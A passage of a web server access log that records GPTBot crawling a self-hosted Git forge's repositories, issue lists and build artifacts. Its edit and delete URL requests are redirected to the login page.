"/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" -[17/Feb/2026:18:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" -[17/Feb/2026:18:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 938] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" -[17/Feb/2026:18:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9836] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" -[17/Feb/2026:18:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 2157] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" -[17/Feb/2026:18:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 1403] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" -[17/Feb/2026:18:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" -[17/Feb/2026:18:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15270] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/storage.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/storage.cpython-312.pyc" -[17/Feb/2026:18:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/storage.cpython-312.pyc" -[17/Feb/2026:18:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=open&type=all" -[17/Feb/2026:18:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11097] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:18:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15558] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:18:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 11123] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:18:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 11121] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:18:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 11122] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:18:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:32:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:18:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:18:32:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:18:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:18:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:18:32:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:18:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:18:32:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:18:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:18:32:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:18:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:18:32:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:18:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:18:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 9821] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:18:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 9821] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:18:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 9821] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:18:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:18:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:18:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:18:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:18:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:18:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:18:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 